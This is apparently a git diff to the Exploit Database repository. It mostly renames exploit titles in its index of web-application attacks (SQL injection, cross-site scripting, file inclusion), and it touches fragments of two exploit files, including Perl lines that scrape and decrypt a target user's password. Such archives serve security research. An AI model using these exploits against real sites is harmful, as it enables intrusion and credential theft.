-10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player.asp player_id' SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
+10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
@@ -22674,7 +22675,7 @@ id,file,description,date,author,platform,type,port
 11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
 11832,platforms/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
 11833,platforms/php/webapps/11833.txt,"4x CMS r26 - (Authentication Bypass) SQL Injection",2010-03-21,cr4wl3r,php,webapps,0
-11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - (Authentication Bypass) SQL Injection",2010-03-22,cr4wl3r,php,webapps,0
+11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,php,webapps,0
 11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0
 14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0
@@ -23352,7 +23353,7 @@ id,file,description,date,author,platform,type,port
 13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0
 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,php,webapps,0
 13751,platforms/php/webapps/13751.txt,"greeting card - Arbitrary File Upload",2010-06-06,Mr.Benladen,php,webapps,0
-13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0
+13752,platforms/php/webapps/13752.txt,"ReVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0
 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0
 13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0
 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0
@@ -24596,7 +24597,7 @@ id,file,description,date,author,platform,type,port
 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0
 17056,platforms/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0
 17057,platforms/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0
-17061,platforms/php/webapps/17061.txt,"Andy's PHP KnowledgeBase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0
+17061,platforms/php/webapps/17061.txt,"Andy's PHP KnowledgeBase 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0
 17062,platforms/php/webapps/17062.txt,"Claroline 1.10 - Persistent Cross-Site Scripting",2011-03-29,"AutoSec Tools",php,webapps,0
 17069,platforms/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0
 17076,platforms/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0
@@ -24604,7 +24605,7 @@ id,file,description,date,author,platform,type,port
 17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0
 17080,platforms/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0
 17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0
-17084,platforms/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0
+17084,platforms/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - 'viewusers.php' SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0
 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps,0
 17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0
 17092,platforms/php/webapps/17092.html,"Allomani News 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0
@@ -25207,7 +25208,7 @@ id,file,description,date,author,platform,type,port
 18417,platforms/php/webapps/18417.txt,"WordPress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0
 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - Cross-Site Request Forgery",2012-01-26,Cyber-Crystal,php,webapps,0
 18419,platforms/php/webapps/18419.html,"phpList 2.10.9 - Cross-Site Request Forgery / Cross-Site Scripting",2012-01-26,Cyber-Crystal,php,webapps,0
-18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8/ 2.9 - Cross-Site Scripting / SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0
+18422,platforms/php/webapps/18422.txt,"Peel Shopping 2.8/ 2.9 - Cross-Site Scripting / SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0
 18424,platforms/php/webapps/18424.rb,"vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection (Metasploit)",2012-01-27,EgiX,php,webapps,0
 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - Cross-Site Request Forgery / Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0
 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",multiple,webapps,0
@@ -27960,7 +27961,7 @@ id,file,description,date,author,platform,type,port
 26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0
 26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php' 'Username' Parameter Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0
 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple Parameter SQL Injection",2005-07-30,"James Bercegay",php,webapps,0
-26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - admin.php contenttypeid Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0
+26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0
 26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - admin.php Cross-Site Scripting",2005-09-30,FalconDeOro,php,webapps,0
 26055,platforms/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a - Authentication Bypass",2005-07-30,VaLiuS,php,webapps,0
 26056,platforms/php/webapps/26056.txt,"MySQL AB Eventum 1.x - view.php id Parameter Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0
@@ -30236,8 +30237,8 @@ id,file,description,date,author,platform,type,port
 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0
 29211,platforms/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0
 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0
-29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
+29093,platforms/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
-29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
+29094,platforms/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0
 40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0
@@ -30269,11 +30270,11 @@ id,file,description,date,author,platform,type,port
 29126,platforms/asp/webapps/29126.txt,"Gnews Publisher - Multiple SQL Injections",2006-11-20,"Aria-Security Team",asp,webapps,0
 29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0
 29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A - NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80
-29133,platforms/asp/webapps/29133.txt,"Rapid Classified 3.1 - viewad.asp id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0
+29133,platforms/asp/webapps/29133.txt,"Rapid Classified 3.1 - 'viewad.asp' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0
-29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 - view_print.asp id Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0
+29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 - 'view_print.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0
-29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - search.asp SH1 Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0
+29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - 'search.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0
-29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 - reply.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0
+29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 - 'reply.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0
-29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - advsearch.asp Denial of Serviceearch Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0
+29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - 'advsearch.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0
 29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0
 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0
 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - 'rss_title' Parameter Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0
@@ -30609,7 +30610,7 @@ id,file,description,date,author,platform,type,port
 29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - error.php Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0
 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps,0
 29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0
-29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 - directions.php typeID Parameter SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0
+29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 - 'typeID' Parameter SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0
 29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ - Arcade.php SQL Injection",2007-02-15,sp00k,php,webapps,0
 29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 - faq.php Cross-Site Scripting",2007-02-15,"BLacK ZeRo",php,webapps,0
 29606,platforms/php/webapps/29606.txt,"Calendar Express - search.php Cross-Site Scripting",2007-02-15,BL4CK,php,webapps,0
@@ -30932,7 +30933,7 @@ id,file,description,date,author,platform,type,port
 30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",php,webapps,0
 30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - Parser_Path Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps,0
 30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 - ShowOwn.php Cross-Site Scripting",2007-05-22,CorryL,php,webapps,0
-30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0
+30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - 'SQLEDIT.php' Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0
 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0
 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",asp,webapps,0
 30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 - rating.php Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0
@@ -31307,7 +31308,7 @@ id,file,description,date,author,platform,type,port
 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 - igallery.asp Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps,0
 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",2007-11-06,0x90,php,webapps,0
 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps,0
-30747,platforms/asp/webapps/30747.txt,"Rapid Classified - AgencyCatResult.asp SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0
+30747,platforms/asp/webapps/30747.txt,"Rapid Classified - 'AgencyCatResult.asp' SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0
 30748,platforms/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - Brokenlink.php SQL Injection",2007-11-09,root@hanicker.it,php,webapps,0
 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0
 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0
@@ -31335,15 +31336,15 @@ id,file,description,date,author,platform,type,port
 30820,platforms/php/webapps/30820.txt,"p.mapper 3.2 beta3 - incPHP/globals.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0
 30821,platforms/php/webapps/30821.txt,"p.mapper 3.2 beta3 - plugins/export/mc_table.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0
 30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0
-30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - /myalbum/ratephoto.php lid Parameter SQL Injection",2007-11-28,Lostmon,php,webapps,0
+30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0
-30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - modules/mylinks/ratelink.php lid Parameter SQL Injection",2007-11-28,Lostmon,php,webapps,0
+30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0
 30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
 30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
 30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/patch/index.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
 30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
 30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
 30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
-30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - adresses/ratefile.php SQL Injection",2007-11-30,Lostmon,php,webapps,0
+30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps,0
 30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - pages/default.aspx template Variable Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0
 30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - xlaabsolutenm.aspx Multiple Parameter SQL Injection",2007-12-04,"Adrian Pastor",asp,webapps,0
 30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - xlaabsolutenm.aspx rmore Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0
@@ -32411,10 +32412,10 @@ id,file,description,date,author,platform,type,port
 32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 - 'html-tidy-logic.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps,0
 32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Parameter Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps,0
 32531,platforms/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0
-32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'include/common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0
+32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0
 32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injection",2008-10-27,G4N0K,php,webapps,0
 32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 - 'moderation.php' Cross-Site Scripting",2008-10-27,Kellanved,php,webapps,0
-32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'modules/banners/click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0
+32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0
 32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps,0
 32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Parameter Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps,0
 32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",php,webapps,0
@@ -32486,8 +32487,8 @@ id,file,description,date,author,platform,type,port
 32630,platforms/asp/webapps/32630.txt,"Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0
 32631,platforms/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,multiple,webapps,0
 32632,platforms/php/webapps/32632.php,"Fantastico - 'index.php' Local File Inclusion",2008-12-02,Super-Crystal,php,webapps,0
-32633,platforms/php/webapps/32633.txt,"Z1Exchange 1.0 - showads.php id Parameter SQL Injection",2008-12-02,Pouya_Server,php,webapps,0
+32633,platforms/php/webapps/32633.txt,"Z1Exchange 1.0 - 'id' Parameter SQL Injection",2008-12-02,Pouya_Server,php,webapps,0
-32634,platforms/php/webapps/32634.txt,"Z1Exchange 1.0 - showads.php id Parameter Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0
+32634,platforms/php/webapps/32634.txt,"Z1Exchange 1.0 - 'id' Parameter Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0
 32635,platforms/asp/webapps/32635.txt,"Jbook - SQL Injection",2008-12-02,Pouya_Server,asp,webapps,0
 32636,platforms/php/webapps/32636.txt,"Orkut Clone - profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0
 32637,platforms/php/webapps/32637.txt,"Orkut Clone - profile_social.php id Parameter Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0
@@ -32505,7 +32506,7 @@ id,file,description,date,author,platform,type,port
 32650,platforms/php/webapps/32650.txt,"PHPepperShop 1.4 - shop/kontakt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0
 32651,platforms/php/webapps/32651.txt,"PHPepperShop 1.4 - shop/Admin/shop_kunden_mgmt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0
 32652,platforms/php/webapps/32652.txt,"PHPepperShop 1.4 - shop/Admin/SHOP_KONFIGURATION.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0
-32653,platforms/asp/webapps/32653.txt,"dotnetindex Professional Download Assistant 0.1 - SQL Injection",2008-12-09,ZoRLu,asp,webapps,0
+32653,platforms/asp/webapps/32653.txt,"Professional Download Assistant 0.1 - SQL Injection",2008-12-09,ZoRLu,asp,webapps,0
 32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products - 'logon_processing.jsp' SQL Injection",2008-12-11,"3d D3v!L",jsp,webapps,0
 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injections",2008-12-01,"security curmudgeon",php,webapps,0
 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary - 'cat' Parameter SQL Injection",2008-12-13,Pouya_Server,asp,webapps,0
@@ -32545,8 +32546,8 @@ id,file,description,date,author,platform,type,port
 32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0
 32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter Cross-Site Scripting",2009-01-15,waraxe,php,webapps,0
 32729,platforms/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0
-32730,platforms/asp/webapps/32730.txt,"Active Bids - search.asp search Parameter Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0
+32730,platforms/asp/webapps/32730.txt,"Active Bids - 'search' Parameter Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0
-32731,platforms/asp/webapps/32731.txt,"Active Bids - search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0
+32731,platforms/asp/webapps/32731.txt,"Active Bids - 'search' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0
 32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' Parameter SQL Injection",2009-01-15,Pouya_Server,php,webapps,0
 32733,platforms/php/webapps/32733.txt,"w3bcms - 'admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0
 32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0
@@ -35105,7 +35106,7 @@ id,file,description,date,author,platform,type,port
 37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion",2012-03-28,"Canberk BOLAT",php,webapps,0
 37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 - code_editor.php Multiple Parameter Cross-Site Scripting",2012-03-28,"High-Tech Bridge",php,webapps,0
 37023,platforms/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps,0
-37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0
+37024,platforms/php/webapps/37024.txt,"EZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0
 37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 - Personal Multiple SQL Injection",2012-03-30,MR.XpR,php,webapps,0
 37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' Parameter SQL Injection",2012-03-30,Am!r,php,webapps,0
 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Parameter Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0
@@ -36934,3 +36935,4 @@ id,file,description,date,author,platform,type,port
 40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0
 40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
 40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
+40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0

platforms/asp/webapps/1597.pl

@@ -62,14 +62,14 @@ sub exploit ()
   print $ap "Connection: close\n\n";
   print "- Connected...\r\n";
   while ($answer = <$ap>) {
-    if ($answer =~ /string: &quot;(.*?)&quot;]'/) {
+    if ($answer =~ /string: "(.*?)"]'/) {
       print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
       print "- Username: $ARGV[2]\r\n";
       print "- Decrypting password....\r\n";
       $appass = $1;
-      $appass =~ s/(&quot;)/chr(34)/eg;
+      $appass =~ s/(")/chr(34)/eg;
-      $appass =~ s/(&lt;)/chr(60)/eg;
+      $appass =~ s/(<)/chr(60)/eg;
-      $appass =~ s/(&gt;)/chr(62)/eg;
+      $appass =~ s/(>)/chr(62)/eg;
       $appass =~ s/(&nbsp;)/chr(32)/eg;
       decrypt();
     }

platforms/asp/webapps/2762.asp

@@ -57,7 +57,7 @@ document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\
 <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
 
 <center>
-<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
+<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>
 Remote SQL Injection Exploit</b></u></a></font><br><br>
 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
   <tr>

platforms/jsp/webapps/40989.txt

@@ -0,0 +1,90 @@
